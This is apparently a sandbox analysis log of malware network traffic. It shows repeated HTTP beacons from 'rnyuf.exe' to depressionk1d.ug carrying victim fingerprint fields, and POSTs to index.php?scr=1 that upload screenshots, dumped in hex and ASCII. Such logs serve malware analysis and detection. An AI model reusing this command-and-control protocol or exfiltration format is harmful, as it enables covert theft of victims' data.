                          Nov 12, 2021 22:23:34.562715054 CET4797OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:34.588666916 CET4797INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:34 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          62192.168.2.449846178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:34.741552114 CET4798OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:34.766436100 CET4798INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:34 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:34.849766970 CET4798OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:34.849802017 CET4798OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:34.850224972 CET4809OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:34.850282907 CET4811OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:34.873059988 CET4838OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:34.895548105 CET4843OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:23:34.895581961 CET4849OUTData Raw: f2 17 b7 ff 00 7a 9f aa 1f f8 9a 5c 7f be 6a 3d 1b fe 42 f6 ff 00 ef 53 b5 13 9d 46 7f f7 cd 72 5b f7 ff 00 23 59 7f 07 e6 56 a4 ef 45 15 b9 ca 2d 14 94 b4 00 52 d2 52 f6 a0 40 29 69 29 69 08 29 45 25 28 a0 41 40 a2 81 48 07 03 4a 29 29 45 21 31
                          Data Ascii: z\j=BSFr[#YVE-RR@)i)i)E%(A@HJ))E!1)"Wm$*PvxEz^^<CW6_9z1z=x'KtVNkQ<i/Vk~B4WIqNQZVCZxsPNE&LsR@)i)"5Tp5
                          Nov 12, 2021 22:23:34.895617962 CET4854OUTData Raw: a4 20 a2 92 8a 00 70 3c 62 83 48 3a d2 9a 77 01 28 a5 e9 45 00 02 96 92 96 81 31 69 28 a2 98 87 0a 5a 41 4b 4c 1e e1 4b 8a 4a 5a 62 02 29 3b d2 d2 1a 00 05 38 50 28 a0 40 29 c2 9a 69 45 50 98 ea 28 a5 1d 69 88 51 4a 28 14 b4 d1 22 af a5 29 18 a4
                          Data Ascii: p<bH:w(E1i(ZAKLKJZb);8P(@)iEP(iQJ(")ykbDE XC8SH*,()Bbu'Zx6\bLB)vRBQIR`$xQjRZh+Tbc|*LQVfKLRF(xN)Mpd=))H(
                          Nov 12, 2021 22:23:34.895636082 CET4859OUTData Raw: 31 7d 6a 99 8a 31 4e 18 ad 91 a4 47 ea 69 46 93 10 ee 69 fd 5e 64 bc 55 33 1b 8a 38 ad bf ec 98 fd 4d 28 d2 62 f5 34 fe af 31 7d 6a 99 89 c5 2e 05 6d 8d 26 2f 53 4e 1a 4c 5e f4 fe af 22 5e 2a 99 89 8a 36 d6 e7 f6 54 5e f4 bf d9 51 7b d5 7d 5e 42
                          Data Ascii: 1}j1NGiFi^dU38M(b41}j.m&/SNL^"^*6T^Q{}^B3m(Z4W?Z/#X]~{yGw>ovZ)3:j1X3/y,0814k/&u!VKte,m5oCKJ)gCUe}
                          Nov 12, 2021 22:23:34.895678043 CET4864OUTData Raw: a8 66 88 72 f5 a7 e6 9a 29 d5 0c d1 0f 53 c5 79 17 c4 f0 16 f2 c7 1f f3 cd ff 00 f4 2a f5 b1 d4 d7 91 fc 4e 3f e9 d6 3f f5 c9 bf f4 2a d2 87 c4 45 53 c7 5a 35 63 92 29 04 29 e9 52 62 94 57 2f 2a 3d 2e 66 33 ca 5e 3d a9 db 17 76 71 cd 2d 19 a7 64
                          Data Ascii: fr)Sy*N??*ESZ5c))RbW/*=.f3^=vq-dbhN!] @7n4Z9P(t0hVBJ!@sE93Ri)c<Dx*J)rc1(nqO ``PFFHD~D#KIF=*c4yIOvBx
                          Nov 12, 2021 22:23:34.895715952 CET4870OUTData Raw: 2b c0 6b dd be 03 de 5a da 78 7f 56 fb 4d cc 30 ee ba 5d be 6c 81 73 84 e7 19 ac 2b fc 06 b4 7e 23 9f ff 00 84 73 5c ff 00 a0 2e a3 ff 00 80 af fe 14 a3 c3 ba ea b0 61 a3 ea 40 83 90 45 ab f1 fa 57 bb ff 00 6c 69 9f f4 12 b3 ff 00 c0 84 ff 00 1a
                          Data Ascii: +kZxVM0]ls+~#s\.a@EWliO/v_]U?Y'Wwe)IdePLmZ5EU?AK/O>2eT6u<KSjV:wwje;j@S%-4&wN5X%WxP2
                          Nov 12, 2021 22:23:34.943231106 CET4906INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:34 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          63192.168.2.449847178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:34.901583910 CET4891OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:34.926917076 CET4906INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:34 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          64192.168.2.449848178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:35.058315039 CET4907OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:35.083642006 CET4908INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:35 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          65192.168.2.449849178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:35.211416006 CET4908OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:35.235934973 CET4909INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:35 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          66192.168.2.449850178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:35.369415045 CET4909OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:35.395613909 CET4949INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:35 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          67192.168.2.449851178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:35.370982885 CET4910OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:35.371074915 CET4910OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:35.371361017 CET4920OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:35.371522903 CET4923OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:35.393804073 CET4926OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:35.393871069 CET4931OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:35.393893003 CET4934OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:35.393904924 CET4937OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:35.393915892 CET4939OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:35.393924952 CET4942OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:35.393934965 CET4943OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:35.466345072 CET5021INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:35 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:35.501413107 CET5021OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:35.527137041 CET5021INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:35 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          68192.168.2.449852178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:35.669938087 CET5022OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:35.695199966 CET5023INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:35 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          69192.168.2.449853178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:35.822403908 CET5023OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:35.847428083 CET5024INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:35 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          7192.168.2.449788178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:09.325980902 CET1378OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:09.326134920 CET1378OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:09.326395988 CET1388OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:09.326632977 CET1391OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:09.348423958 CET1393INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:09 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
